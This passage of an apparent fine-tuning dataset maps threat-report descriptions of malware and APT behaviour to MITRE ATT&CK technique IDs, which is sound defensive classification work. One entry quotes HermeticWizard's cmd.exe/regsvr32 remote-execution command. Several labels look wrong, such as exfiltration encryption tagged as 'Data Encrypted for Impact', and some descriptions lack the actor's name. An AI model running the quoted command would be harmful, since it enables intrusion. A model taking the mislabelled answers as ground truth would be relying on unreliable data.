- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BlackEnergy has gathered information about network IP configurations using ipconfig.exe and about routing tables using route.exe."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly 2.0 deleted many of its files used during operations as part of cleanup, including removing applications and deleting screenshots."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Honeybee uses a dropper called MaoCheng that harvests a stolen digital signature from Adobe Systems."
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In the list of dropped files, VMwareCplLauncher.exe is a legitimate, signed VMware executable that serves to ultimately deliver the BADNEWS payload. The vmtools.dll file is a modified DLL that both ensures persistence and loads MSBuild.exe, which is the BADNEWS malware renamed to spoof a legitimate Microsoft Visual Studio tool. After the files are dropped, the VMwareCplLauncher.exe executable is run, which in turn loads the vmtools.dll DLL file. This DLL file creates a scheduled task named BaiduUpdateTask1, which attempts to run the malicious, spoofed MSBuild.exe every subsequent minute. The technique of having a signed, legitimate, executable load a malicious library is commonly referred to as side-loading, and has been witnessed in a number of campaigns and malware families in the past. The flow of execution from the time the victim opens the malicious Microsoft Word document, to the execution of BADNEWS, may be seen below"
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task', 'T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attackers execute several Base64-encoded PowerShell commands in order to determine if the infected machine’s user is in the admin or domain admin group"
- },
- {
- "role": "assistant",
- "content": "T1087.002 - Account Discovery: Domain Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Using job opportunities as template is the known method used by Lazarus to target its victims. The documents created by this actor are well designed and contain a large icon for a known company such as LockHeed Martin, BAE Systems, Boeing and Northrop Grumman in the template. In this campaign the actor has targeted people that are looking for job opportunities at Lockheed Martin. Targeting the defense industry and specifically Lockheed Martin is a known target for this actor"
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MarkiRAT can masquerade as \"update.exe\" and \"svehost.exe\"; it has also mimicked legitimate Telegram and Chrome files."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After copying itself to a DLL file, a variant of Elise calls the DLL file using rundll32.exe."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TrickBot has used macros in Excel documents to download and deploy the malware on the user’s machine."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "malware IndiaIndia saves information gathered about the victim to a file that is compressed with Zlib, encrypted, and uploaded to a C2 server. malware RomeoDelta archives specified directories in .zip format, encrypts the .zip file, and uploads it to its C2 server. A malware sample encrypts data using a simple byte based XOR operation prior to exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used legitimate VPN, RDP, Citrix, or VNC credentials to maintain access to a victim environment."
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts', 'T1133 - External Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KeyBoy uses the Dynamic Data Exchange (DDE) protocol to download remote payloads."
- },
- {
- "role": "assistant",
- "content": "T1559.002 - Inter-Process Communication: Dynamic Data Exchange"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BitPaymer can modify the timestamp of an executable so that it can be identified and restored by the decryption tool."
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 has granted `company administrator` privileges to a newly created service principal."
- },
- {
- "role": "assistant",
- "content": "T1098.003 - Account Manipulation: Additional Cloud Roles"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group has used mshta.exe to run malicious scripts and download programs."
- },
- {
- "role": "assistant",
- "content": "T1218.005 - Signed Binary Proxy Execution: Mshta"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LookBack side loads its communications module as a DLL into the \"libcurl.dll\" loader."
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AppleSeed can identify the IP of a targeted system."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Note that the heading of the message box is ‘ASKOD’, a reference to the Ukrainian electronic document management system. This initiative is meant to enforce electronic digital signatures through the use of cryptographic keys like the Алмаз-1К (transliterated as ‘Almaz-1K’ or translated to ‘Diamond-1K’) shown below"
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Register the RUN key in the registry below, so that the VBS file is executed every time the machine starts"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Rover copies files from removable drives to \"C:\\system\"."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Zebrocy is delivered primarily via phishing attacks that contain malicious Microsoft Office documents with macros as well as simple executable file attachments"
- },
- {
- "role": "assistant",
- "content": "T1598.002 - Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For C0015, the threat actors obtained a variety of tools, including AdFind, AnyDesk, and Process Hacker."
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Leviathan has compromised social media accounts to conduct social engineering attacks."
- },
- {
- "role": "assistant",
- "content": "T1586.001 - Social Media Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BoomBox has the ability to execute an LDAP query to enumerate the distinguished name, SAM account name, and display name for all domain users."
- },
- {
- "role": "assistant",
- "content": "T1087.002 - Account Discovery: Domain Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A malware sample encodes data with base64."
- },
- {
- "role": "assistant",
- "content": "T1132 - Data Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Targets are sent spear phishing e-mails that lead them to a web site displaying a lure document and are immediately prompted to install a malicious Google Chrome extension. It then redirects the user to install a “Font Manager” extension from the Chrome Web Store, as seen in Figure 2. Figure 2: HTML Source of Phishing Page The malicious extensions, now removed from the Chrome Web Store, contain reviews left by the threat actor using compromised Google+ accounts. It should be noted however, that some users reported deleting the extension immediately because it prevented the Chrome browser from functioning properly. The malicious Chrome extensions declare permissions to run on every URL in the browser, as seen in Figure 3. Loading jQuery.js from an external site makes no sense, since the latest version of extension has a legitimate jQuery.js included in the extension bundle. Figure 4: Given the threat actor’s propensity for password theft, and the fact that the malicious Chrome extensions were situated to read data from every website, it's likely that the intent is to steal browser cookies and passwords. Figure 5: Certificate used to sign MECHANICAL/GREASE While the threat actors did use a few tools to automate intrusions, we also found a ZIP archive of tools that demonstrate their propensity for password theft to propagate. Advise users to be wary of any prompts to install browser extensions, even if they are hosted on an official extension site. They spent significant time and resources doing reconnaissance on their targets, as evidenced by the comments left on the Chrome extension page"
- },
- {
- "role": "assistant",
- "content": "T1176 - Browser Extensions"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "modules are written in and executed via ."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For C0011, Transparent Tribe hosted malicious documents on domains registered by the group."
- },
- {
- "role": "assistant",
- "content": "T1608.001 - Upload Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The shellcode loaded by the macro contains an encrypted DLL which is decrypted at runtime and then manually mapped into memory by the shellcode. After mapping the DLL, the shellcode jumps to the entry point of that DLL. The shellcode uses some kind of custom hashing method to resolve the APIs. We used hollows_hunter to dump the DLL and reconstruct the IAT once it is fully mapped into memory"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information', 'T1620 - Reflective Code Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This module was delivered, like many other tools, in a 7z self-extracting archive. Inside, there was a password-protected RAR archive containing a few files"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Penquin can remove strings from binaries."
- },
- {
- "role": "assistant",
- "content": "T1027.005 - Indicator Removal from Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Grandoreiro has infected victims via malicious attachments."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Attackers like to use spear-fishing email with password protected RAR attachment to avoid being detected by the email gateway. Decryption password is provided in the mail body and inside the attachment it is a MHTML macro based document with the .doc suffix. Its purpose is to implant Imminent backdoor and gain a foothold into the target network which may make the follow up lateral movement easier to implement"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SILENTTRINITY can load additional files and tools, including Mimikatz."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Stuxnet transforms encrypted binary data into an ASCII string in order to use it as a URL parameter value."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PLATINUM has used keyloggers that are also capable of dumping credentials."
- },
- {
- "role": "assistant",
- "content": "T1003.001 - OS Credential Dumping: LSASS Memory"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The injected payload is known as Cobalt Strike Beacon and can be used to execute commands, inject other processes, elevate current processes or impersonate other processes, and upload and download files. The Get-NetComputer command from PowerView is renamed by the attackers to a random name"
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SHOTPUT has a command to obtain a process listing."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RIPTIDE’s first communication with its C2 server fetches an encryption key, and the RC4 encryption key is used to encrypt all further communication"
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Heyoka Backdoor has the ability to search the compromised host for files."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT39 used secure shell (SSH) to move laterally among their targets."
- },
- {
- "role": "assistant",
- "content": "T1021.004 - Remote Services: SSH"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During C0015, the threat actors downloaded additional tools and files onto a compromised network."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Smoke Loader searches for credentials stored from web browsers."
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CHOPSTICK used a proxy server between victims and the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1090.001 - Proxy: Internal Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chaes used the \"CreateFileW()\" API function with read permissions to access downloaded payloads."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During C0015, the threat actors limited Rclone's bandwidth setting during exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1030 - Data Transfer Size Limits"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "obtains the number of removable drives from the victim."
- },
- {
- "role": "assistant",
- "content": "T1120 - Peripheral Device Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN6 also moved laterally to servers in the environment using RDP and configured them as malware “distribution” servers. Mandiant identified a utility script named kill.bat that was run on systems in the environment. FIN6 automated the deployment of kill.bat and the LockerGoga ransomware using batch script files. FIN6 created a number of BAT files on the malware distribution servers with the naming convention xaa.bat, xab.bat, xac.bat, etc. FIN6 renamed the psexec service name to “mstdc” in order to masquerade as the legitimate Windows executable “msdtc. Domain administrators have complete control over Windows systems in an Active Directory environment"
- },
- {
- "role": "assistant",
- "content": "T1036.004 - Masquerading: Masquerade Task or Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collects keystrokes from the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1056 - Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BLACKCOFFEE uses Microsoft’s TechNet Web portal to obtain a dead drop resolver containing an encoded tag with the IP address of a command and control server."
- },
- {
- "role": "assistant",
- "content": "T1102.001 - Dead Drop Resolver"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HALFBAKED can delete a specified file."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SLOTHFULMEDIA has deleted itself and the 'index.dat' file on a compromised machine to remove recent Internet history from the system."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An APT28 loader Trojan adds the Registry key \"HKCU\\Environment\\UserInitMprLogonScript\" to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1037.001 - Boot or Logon Initialization Scripts: Logon Script (Windows)"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pteranodon exfiltrates screenshot files to its C2 server."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HermeticWizard can use WMI to create a new process on a remote machine via `C:\\windows\\system32\\cmd.exe /c start C:\\windows\\system32\\\\regsvr32.exe /s /iC:\\windows\\.dll`."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Endpoint Protection . Buckeye cyberespionage group shifts gaze from US to Hong Kong . Buckeye (also known as APT3, Gothic Panda, UPS Team, and TG-0110) is a cyberespionage group that is believed to have been operating for well over half a decade. Buckeye used a remote access Trojan (Backdoor.Pirpi) in attacks against a US organization’s network in 2009. Symantec has identified additional tools used by the group, which will be discussed later. Organizations that Buckeye targeted over time, per region . Malware and tools . Buckeye uses a number of hacking tools as well as malware. Buckeye uses Backdoor.Pirpi, a remote access Trojan capable of reading, writing, and executing files and programs. As mentioned previously, Buckeye also uses a number of hacking tools, including the following: Keylogger: The keylogger is configured using the command line parameters: NetworkService, Replace, Install, Register and Unregister. RemoteCMD: This tool executes commands on remote computers, similar to the PsExec tool. On execution, the tool injects itself into lsass.exe and is triggered with the argument “dig”. OSinfo: OSInfo is a general purpose, system information gathering tool. It has the following command line argument help: ChromePass: A tool from NirSoft used for recovering passwords stored in the Chrome browser. This, coupled with the group’s use of zero-day exploits in the past, customized tools, and the types of organizations being targeted would suggest that Buckeye is a state-sponsored cyberespionage group"
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It then downloads and decrypts a PNG file"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HEXANE has enumerated processes on targeted systems."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Komplex trojan supports file deletion."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OilRig has used Remote Desktop Protocol for lateral movement. The group has also used tunneling tools to tunnel RDP into the environment."
- },
- {
- "role": "assistant",
- "content": "T1021.001 - Remote Services: Remote Desktop Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Amadey has overwritten registry keys for persistence."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PowerStallion modifies the MAC times of its local log files to match that of the victim's desktop.ini file."
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ROADTools can enumerate Azure AD groups."
- },
- {
- "role": "assistant",
- "content": "T1069.003 - Cloud Groups"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Throughout our research, we witnessed several different infection chains being used to deliver the Aria-body backdoor. This RTF file, which was infected (weaponized) with the RoyalRoad exploit builder, drops a loader named intel.wll into the target PC’s Word startup folder. The loader in turn tries to download and execute the next stage payload from spool.jtjewifyn[.]com"
- },
- {
- "role": "assistant",
- "content": "T1137.006 - Office Application Startup: Add-ins"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KONNI has modified registry keys of ComSysApp, Svchost, and xmlProv on the machine to gain persistence."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses HTTP TCP port 80 and HTTPS TCP port 443 for communications."
- },
- {
- "role": "assistant",
- "content": "T1043 - Commonly Used Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Winnti for Linux has used a custom TCP protocol with four-byte XOR for command and control (C2)."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Samples associated with either RedAlpha campaign remain quite rare, with less than 20 samples identified across the two campaigns. Custom samples are coded in C++. The 2018 dropper relied on a rare C++ cross-platform framework called Haxe to string together pieces of publicly available source code largely found in Chinese-language forums and blogs."
- },
- {
- "role": "assistant",
- "content": "T1587.001 - Malware"
- }
- ]
- },
- {
